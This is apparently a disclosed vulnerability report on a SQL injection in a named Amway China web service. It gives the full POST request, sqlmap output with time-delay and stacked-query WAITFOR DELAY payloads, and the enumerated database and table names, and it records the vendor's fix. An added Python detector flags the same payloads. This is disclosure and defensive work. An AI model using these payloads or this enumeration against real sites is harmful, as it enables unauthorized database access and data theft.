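2014-03-07: Details reported to the vendor; awaiting vendor handling
2014-03-11: Vendor confirmed; details disclosed to the vendor only
2014-03-21: Details disclosed to core white hats and experts in related fields
2014-03-31: Details disclosed to regular white hats
2014-04-10: Details disclosed to intern white hats
2014-04-21: Details disclosed to the public

SQL injection

The WebService interface http://www.amway.com.cn/amwayplaza/AmwayServices.asmx?op=PvAddClick has a POST-based SQL injection vulnerability.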

POST /amwayplaza/AmwayServices.asmx/PvAddClick HTTP/1.1
Host: www.amway.com.cn
Proxy-Connection: keep-alive
Content-Length: 26
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://www.amway.com.cn
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://www.amway.com.cn/amwayplaza/AmwayServices.asmx?op=PvAddClick
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8,zh-CN;q=0.6,zh;q=0.4
Cookie: arp_scroll_position=0

Token=1&Title=2&Category=3

sqlmap identified the following injection points with a total of 94 HTTP(s) requests:
---
Place: POST
Parameter: Token
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: Token=1'; WAITFOR DELAY '0:0:5'--&Title=2&Category=3

    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: Token=1' WAITFOR DELAY '0:0:5'--&Title=2&Category=3
---
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2012

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: POST
Parameter: Token
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: Token=1'; WAITFOR DELAY '0:0:5'--&Title=2&Category=3

    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: Token=1' WAITFOR DELAY '0:0:5'--&Title=2&Category=3
---
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2012
available databases [16]:
[*] Amway
[*] amway_main
[*] AmwayProduct
[*] AmwaySearch
[*] dbIBOXMS_Amway
[*] dbIBOXMS_Main
[*] dbIBOXMS_Main_in
[*] IBOX_AmwayPlaza
[*] master
[*] model
[*] msdb
[*] ReportServer
[*] ReportServerTempDB
[*] tempdb
[*] WebCrawl
[*] WebCrawlACTI

Database: Amway
[12 tables]
+------------------+
| FA_Product       |
| FA_Product_amway |
| FA_Product_aynex |
| dtproperties     |
| tbAdmin          |
| tbClick          |
| tbRoom           |
| tbRoomProduct    |
| tbVisit          |
| tbVisitReport    |
| tbqallary        |
| tbqallaryImg     |
+------------------+

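Very time-consuming, so I did not continue testing.
You know.
Severity: Low
Vulnerability Rank: 4
Confirmation time: 2014-03-11 11:50
This vulnerability has been confirmed and fixed. Thanks to the white hat for reporting it.
2014-04-21: The vulnerability has been fixed. Thanks to the white hat for the support.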
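
A detection-side view of the two payloads in the sqlmap output, as an added example that is not part of the original report: a small Python check for form-urlencoded POST bodies sent to the web service, flagging the stacked-query and time-delay patterns. The function names, labels and the last two sample bodies are assumptions constructed for illustration.

```python
import re
from urllib.parse import unquote_plus

# Signatures for the two techniques in the sqlmap output above (MSSQL/Sybase).
WAITFOR = re.compile(r"\bWAITFOR\s+DELAY\s+'[\d:.]+'", re.IGNORECASE)
STACKED = re.compile(r"'\s*;")  # quote ends the literal, ';' starts a new statement
QUOTE_COMMENT = re.compile(r"'.*--\s*$", re.DOTALL)  # quote, then rest commented out


def inspect_body(body):
    """Return {parameter: [labels]} for suspicious form-urlencoded fields."""
    findings = {}
    # Split on '&' only: ';' belongs to the payload and must stay in the value.
    for pair in body.split("&"):
        name, _, raw = pair.partition("=")
        value = unquote_plus(raw)  # decode %xx and '+' before matching
        labels = []
        if WAITFOR.search(value):
            labels.append("time-delay")
        if STACKED.search(value):
            labels.append("stacked-query")
        if QUOTE_COMMENT.search(value):
            labels.append("quote-then-comment")
        if labels:
            findings[unquote_plus(name)] = labels
    return findings


# Constructed sample bodies: the baseline request and both payloads are copied
# from the report; the last two entries are made up for this example
# (a URL-encoded lowercase variant and a benign value containing an apostrophe).
SAMPLES = [
    "Token=1&Title=2&Category=3",
    "Token=1'; WAITFOR DELAY '0:0:5'--&Title=2&Category=3",
    "Token=1' WAITFOR DELAY '0:0:5'--&Title=2&Category=3",
    "Token=1%27%3B+waitfor+delay+%270%3A0%3A5%27--&Title=2&Category=3",
    "Token=1&Title=O%27Brien+--+spring+sale&Category=3",
]


def scan(samples=SAMPLES):
    """Pair each sample body with its findings."""
    return [(body, inspect_body(body)) for body in samples]


if __name__ == "__main__":
    for body, hits in scan():
        print("ALERT" if hits else "ok   ", hits, body)
```

Pattern matching of this kind only supports monitoring; parameterized queries on the server side are what remove the injection.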